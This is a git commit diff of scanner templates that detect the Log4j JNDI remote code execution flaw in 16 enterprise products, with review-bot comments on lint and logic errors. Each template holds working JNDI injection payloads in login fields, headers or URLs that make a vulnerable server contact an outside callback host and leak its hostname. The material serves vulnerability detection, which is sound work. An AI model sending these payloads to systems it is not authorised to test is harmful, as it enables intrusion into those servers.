add metadata & lint fix

patch-1
Dhiyaneshwaran 2023-10-19 12:58:29 +05:30
parent a5debfb4aa
commit 777d9645ef
16 changed files with 114 additions and 88 deletions


@ -2,7 +2,7 @@ id: cisco-broadworks-log4j-rce
info:
name: Cisco BroadWorks - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Cisco BroadWorks is susceptible to Log4j JNDI remote code execution. Cisco BroadWorks is an enterprise-grade calling and collaboration platform delivering unmatched performance, security and scale.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
fofa-query: "Cisco BroadWorks"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,cisco,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,11 +29,10 @@ http:
POST /commpilot/servlet/Login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Connection: close
domain=test.com&UserID=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&EnteredUserID=a&Password=a
domain={{str}}.com&UserID=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&EnteredUserID=a&Password=a
matchers-condition: and
matchers:
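Review bot: The new `str` variable is double-quoted while the two `rand*` entries directly above it are single-quoted; the value contains no escape sequences, so `str: '{{rand_base(5)}}'` would keep the variables block in one style. The same mixed quoting is introduced in the variables block of every other template in this commit (WebEx, XenApp, F-Secure, Flexnet, FortiPortal, Jitsi, Logstash, Desktop Central, Okta, OpenShift, Papercut, Pega, Sonicwall, Splunk, Symantec). The raw request block in the second hunk begins before the hunk, so I cannot see whether the header/body separator survived the edit.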


@ -2,7 +2,7 @@ id: cisco-webex-log4j-rce
info:
name: Cisco WebEx - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Cisco WebEx"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -31,7 +33,7 @@ http:
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&bAjax=true
type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: citrix-xenapp-log4j-rce
info:
name: Citrix XenApp - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: html:"/citrix/xenapp"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -31,7 +33,7 @@ http:
Referer: {{RootURL}}/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected
Content-Type: application/x-www-form-urlencoded
LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a
LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
matchers-condition: and
matchers:


@ -2,10 +2,10 @@ id: f-secure-policymanager-log4j-rce
info:
name: F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
reference:
- https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
classification:
@ -15,16 +15,19 @@ info:
cwe-id: CWE-77
metadata:
verified: true
shodan-query: html:"F-Secure Policy Manager"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,fsecure,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /fsms/fsmsh.dll?FSMSCommand=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /fsms/fsmsh.dll?FSMSCommand=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Referrer: {{RootURL}}


@ -2,10 +2,10 @@ id: flexnet-log4j-rce
info:
name: Flexnet - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Flexnet is susceptible to Log4j JNDI remote code execution.
Flexnet is susceptible to Log4j JNDI remote code execution.
reference:
- https://community.flexera.com/t5/Revenera-Company-News/Security-Advisory-Log4j-Java-Vulnerability-CVE-2021-4104-CVE/ba-p/216905
classification:
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Flexnet"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,9 +31,8 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/flexnet/logon.do
Content-Type: application/x-www-form-urlencoded
Connection: close
action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a&domain=FLEXnet
action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&domain=FLEXnet
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: fortiportal-log4j-rce
info:
name: FortiPortal - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
FortiPortal is susceptible to Log4j JNDI remote code execution. FortiPortal provides comprehensive security management and analytics within a multi-tenant, multi-tier management framework.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: html:"FortiPortal"
tags: cve,cve2021,rce,jndi,log4j,fortiportal,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -30,9 +32,8 @@ http:
Accept: application/json, text/plain, */*
Referer: {{RootURL}}/fpc/app/login
Content-Type: application/json
Connection: close
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}","password":"aa","isAdmin":false,"locale":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}","password":"{{str}}","isAdmin":false,"locale":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}"}
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: jitsi-meet-log4j-rce
info:
name: Jitsi Meet - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Jitsi Meet is susceptible to Log4j JNDI remote code execution. Jitsi is a collection of free and open-source multiplatform voice, video conferencing and instant messaging applications for the Web platforms.
@ -14,23 +14,22 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Jitsi Meet"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,jitsi,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /http-bind?room=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /http-bind?room=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Accept: /
Origin: {{RootURL}}
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: logstash-log4j-rce
info:
name: Logstash - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Logstash is susceptible to Log4j JNDI remote code execution. Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash."
@ -14,17 +14,19 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: html:"logstash"
tags: cve,cve2021,rce,jndi,log4j,logstash,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Referrer: {{RootURL}}/app/management/ingest/pipelines/
Content-Type: application/json


@ -2,7 +2,7 @@ id: manage-engine-dc-log4j-rce
info:
name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"ManageEngine Desktop Central"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -30,7 +32,7 @@ http:
Referer: {{RootURL}}/configurations
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage=
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: okta-log4j-rce
info:
name: Okta - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
@ -14,17 +14,19 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Okta"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and


@ -2,7 +2,7 @@ id: openshift-log4j-rce
info:
name: OpenShift - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"OpenShift"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,11 +29,10 @@ http:
POST /Login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/login?then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3Dhttps%253A%252F%252F{{Hostname}}%252Fconsole%252Foauth%26response_type
Referer: {{RootURL}}/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri={{BaseURL}}/console/oauth&response_type
Content-Type: application/x-www-form-urlencoded
Connection: close
then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=aaa
then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
matchers-condition: and
matchers:
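Review bot: The rewritten body line still reads `/{{str}}}26response_type%3Dcode` with no `%` before `26`, so unlike the surrounding `%2F`/`%3F`/`%3D` the `&response_type=code` part is not actually encoded into the `then` value; since the line is touched here it should become `/{{str}}}%26response_type%3Dcode`. The new Referer line also changes meaning: the old percent-encoded form kept `/oauth/authorize?client_id=...` as a single `then` value, whereas the plain `?` and `&` in the new form split it into separate query parameters of `/login`, and it now mixes `{{RootURL}}` with `{{BaseURL}}` in one URL. That is probably harmless because a Referer is rarely parsed, but if the header was meant to mirror the body it should keep the encoded form. The raw request block starts before this hunk.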


@ -2,7 +2,7 @@ id: papercut-log4j-rce
info:
name: Papercut - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Papercut"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,9 +31,8 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/app
Content-Type: application/x-www-form-urlencoded
Connection: close
service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en
service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en
matchers-condition: and
matchers:


@ -2,7 +2,7 @@ id: pega-log4j-rce
info:
name: Pega - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Pega is susceptible to Log4j JNDI remote code execution. Pega provides a powerful low-code platform that empowers the world's leading enterprises to Build for Change.
@ -14,24 +14,30 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Pega"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,pega,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
POST /prweb/app/default/_56mEsR4RqBouCrZGfkkFF8v406BUOZt/!STANDARD HTTP/1.1
GET /prweb/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST {{location}} HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/prweb/app/default/_56mEsR4RqBouCrZGfkkFF8v406BUOZt*/!STANDARD
Referer: {{location}}
Content-Type: application/x-www-form-urlencoded
Connection: close
pzAuth=guest&UserIdentifier=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&Password=a&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
pzAuth=guest&UserIdentifier=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&Password=a&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
matchers-condition: and
matchers:
@ -60,4 +66,11 @@ http:
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
part: interactsh_request
- type: kval
kval:
- location
internal: true
name: location
part: header_1
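Review bot: `max-request: 1` in the metadata no longer matches the request block, which after this change sends two raw requests (`GET /prweb/` and `POST {{location}}`); it should read `max-request: 2`. The new kval extractor (`name: location`, `part: header_1`, `internal: true`) makes the second request depend on the first response carrying a Location header, and nothing visible guards the case where it is absent, in which case `{{location}}` presumably goes out unexpanded; a short comment above the extractor stating that dependency, e.g. `# second request posts to the redirect target of GET /prweb/`, would help the next maintainer. The `matchers:` list that the first hunk opens continues outside the hunk.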


@ -2,7 +2,7 @@ id: sonicwall-nsm-log4j-rce
info:
name: Sonicwall NSM - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Sonicwall NSM is susceptible to Log4j JNDI remote code execution. SonicWall Network Security Manager (NSM) allows you to centrally orchestrate all firewall operations error-free, see and manage threats and risks across your firewall ecosystem from one place, and stay connected and compliant.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"SonicWall Network Security"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,soniwall,oast,kev
tags: cve,cve2021,rce,jndi,log4j,sonicwall,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,15 +29,14 @@ http:
POST /api/sonicos/auth HTTP/1.1
Host: {{Hostname}}
X-Snwl-Timer: no-reset
Authorization: Digest username="${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}", realm="admin-users@x.x.x.x", uri="/api/sonicos/auth", algorithm=SHA-256
Authorization: Digest username="${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/}", realm="admin-users@x.x.x.x", uri="/api/sonicos/auth", algorithm=SHA-256
Content-Type: application/json
Accept: application/json, text/plain, /
X-Snwl-Api-Scope: extended
Origin: {{RootURL}}
Referer: {{RootURL}}/
Connection: close
Referer: {{RootURL}}
{"override":false,"snwl":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}"}
{"override":false,"snwl":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}"}
matchers-condition: and
matchers:
@ -47,25 +48,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip
- interactsh_ip
- interactsh_ip # Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
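Review bot: The rewritten `Authorization` header ends its LDAP URL with a bare `/}` where every other rewritten request in this commit, including the JSON body a few lines below in the same hunk, uses `/{{str}}}`; the `test` segment was removed rather than replaced. If both injection points are meant to carry the same marker, the header should read `...{{interactsh-url}}/{{str}}}", realm="admin-users@x.x.x.x", ...`. The raw request block starts before the hunk, so I cannot confirm that the header/body separator is intact.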


@ -2,7 +2,7 @@ id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: http.title:"Login - Splunk"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,11 +31,10 @@ http:
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}/
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a&return_to=%2Fen-US%2F
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
matchers-condition: and
matchers:
@ -45,25 +46,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip
- interactsh_ip
- interactsh_ip # Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request


@ -2,7 +2,7 @@ id: symantec-sepm-log4j-rce
info:
name: Symantec SEPM - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Symantec SPEM is susceptible to Log4j JNDI remote code execution.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Symantec Endpoint Protection Manager"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -32,7 +34,7 @@ http:
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
actionString=%2Fnoupdate%2FSEPMPasswordField_118937502%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_118937502%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&__Action=v4&__FastSubmit=true
actionString=%2Fnoupdate%2FSEPMPasswordField_{{field}}%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_{{field}}%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&__Action=v4&__FastSubmit=true
matchers-condition: and
matchers:
@ -61,4 +63,4 @@ http:
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
part: interactsh_request
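Review bot: `{{field}}` in the rewritten body has no visible definition: the `variables` block in the earlier hunk declares only `rand1`, `rand2` and `str`, `max-request: 1` rules out an extractor from a prior request, and the hunk offsets (+2) are fully explained by the two metadata additions. Unless the value is supplied from outside the template, the placeholder presumably goes out unexpanded and the request no longer carries the original `SEPMPasswordField_118937502` identifier. Either add it to `variables`, e.g. `field: '118937502'` if that id is fixed, or restore the literal in the body; the raw request block starts before this hunk.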